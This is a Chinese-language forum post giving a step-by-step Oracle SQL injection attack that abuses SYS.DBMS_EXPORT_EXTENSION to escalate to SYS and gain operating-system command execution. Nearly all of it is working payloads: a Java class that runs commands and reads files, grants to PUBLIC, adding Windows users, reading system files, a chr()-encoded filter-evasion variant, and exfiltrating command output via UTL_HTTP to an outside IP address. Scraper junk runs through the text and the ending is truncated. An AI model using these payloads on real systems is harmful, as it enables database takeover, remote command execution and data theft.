
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  }' S3 X1 `: i7 Q$ {+ c( a* p. o5 Z' C1 R+ V; G( ]( i
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) ' D  `: p6 K/ S) l# j
的形式即可。(用 " 'a'|| " 是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
& a1 Q6 h/ ~/ A" e9 T5 d" e/xxx.jsp?id=1 and '1'<>'a'||(   J( d3 I4 E/ Q  J1 K3 h0 g, m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ G4 t/ A3 G( o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
6 r  o3 ^. b$ {; y; c! @+ u, rnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}9 E4 q# p3 Q# e0 g9 ~( `2 {
}'''';END;'';END;--','SYS',0,'1',0) from dual
# d9 J7 o' N( N  ]* X4 o5 A& w* V)
, q! ^/ R& d+ S# b/ S------------------------ 4 A2 A0 M: U! P$ m3 u6 I
如果url有长度限制,可以把readFile()函数块去掉,即:
6 \4 ~* E3 W! o& F9 |8 p/xxx.jsp?id=1 and '1'<>'a'||(
9 ^0 [) |' P; b1 _7 C, Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' Y8 l+ l% L8 U
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
1 }; _! p; R' Z" g( l6 Dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
6 K/ Q8 j7 N0 q4 S}'''';END;'';END;--','SYS',0,'1',0) from dual & _9 [. u. @; a8 g2 I4 e
)
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------ # I' H: V6 G7 z+ G' ?+ X- Y
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual( d% y1 k/ f2 t1 f/ A/ \# C
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- l# ~2 r! z) ~' Screate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual. Z$ U0 X8 B( j2 `- i) B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ r" C/ @9 q* t* ?( y& n
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual: U/ ~9 g* e6 y; Q! F3 F4 k/ i
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual! u5 t9 \5 B. r* E$ \& t3 C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual( z' ?% [# l5 l+ H2 `
5.测试上面的几步是否成功
9 |' N5 Y( C/ n3 C' P& k5 C  rand '1'<>'11'||(
% O# L4 z) V8 ~4 v6 Lselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'   {( v9 X5 I5 F+ d2 d
) 6 w+ K. k; o" A  H- j) Y
and '1'<>(
! u" O0 j, s6 Q' s, T# hselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
- w& D# c9 ~0 _  \) ) X& P3 k7 s/ X: Q/ {
6.执行命令:
! V( K3 t. z4 F- k6 B/xxx.jsp?id=1 and '1'<>(
4 F% K, L5 @3 y2 Z1 W! K8 z. l6 ]select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
  p! d# [/ G1 W8 x: m, m- `4 Y$ e* s' l9 L7 N3 h
) 6 I& ]( i0 S' ~* m8 F0 s" R
/xxx.jsp?id=1 and '1'<>( * A- ~2 [# f6 t  w/ g
select  sys.LinxReadFile('c:/boot.ini') from dual, G0 [& Y9 ~" E

% C: s: |* m* A( h: F1 I% ]% a. Q)
. `* }! X7 d, S# l& n! j* e  9 h6 ^/ [9 K" A  k
注意sys.LinxReadFile()返回的是varchar类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
: {  J. m# t3 e6 y/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
4 G! @) ?, X, a4 ~! O或者UTL_HTTP.request(:
! F0 p1 @3 F& B$ v/xxx.jsp?id=1 and '1'<>( . H' V6 y# f& x0 E( n2 u; Q& M
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual( E! o9 L5 Q6 }8 @0 I; A
) ) F- J+ p0 b* t7 c. B+ o, F3 x
/xxx.jsp?id=1 and '1'<>(
9 u! ?: k& @; g% }SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual: E) D6 `, o5 P3 A9 O/ S
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
-------------------- % |. i- f' w9 V9 o/ e, @& N
6.内部变化
5 s" M; A- h6 ?9 x" Z2 {. J1 s* Y" I通过以下命令可以查看all_objects表达改变:
& t" V5 B. n; R$ o0 {  Lselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'3 R& U, i( b1 Y; B! @; X
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 S. X% ^3 h! i+ m( ^% y
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
9 ?, _7 ?$ }# L( J4 j- Y0 l====================================================
全文结束。谨以此文赠与我的朋友。
linx ) E) {! O4 G' \- Z' L
124829445 # F" I3 O7 v) S) s- l/ m6 L3 l) P
2008.1.12
% ^" \  p7 @' c, c7 e9 N: U" K6 K0 zlinyujian@bjfu.edu.cn ) ~0 F' j. W# W9 h8 H7 {
====================================================================== 0 a- B$ F2 ~* I
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 ~5 Y1 a. l6 w$ BCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual7 z$ ?9 _# o+ g
即:
# g# r: J8 d) ]' sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
% x3 h9 _$ J. D( \1 mchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(   t4 N- |, Z" p4 [6 y
select user_id from all_users where username='LINXSQL'
! s& O: X+ G; @+ ]' T$ c! }2 C7 o) w) & Y5 d. J7 c' ~. |2 h3 D
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 {" D/ i8 w& U2 kGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 S  M- m* h0 e, N+ L9 s# Xdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 0 e- M# r" c1 [5 H
====================== 2 F, C8 [. a! G
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
# K' b  C2 l1 N( c9 y1.jsp?id=1 and '1'<>( . m9 W. y$ H! n$ j' f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ V# Y, m+ z$ c. r' bcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual* Z: }  L0 W* ]0 K- B. H
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE4 `; i, }1 I( ?2 Q
 )9 ]8 P& X1 o1 s* W) I

; c# M' M& x4 ^4 ^- n* n! n5 t9 V5 w# r" V. }
, B0 B! j& g0 D4 c% b, Z  K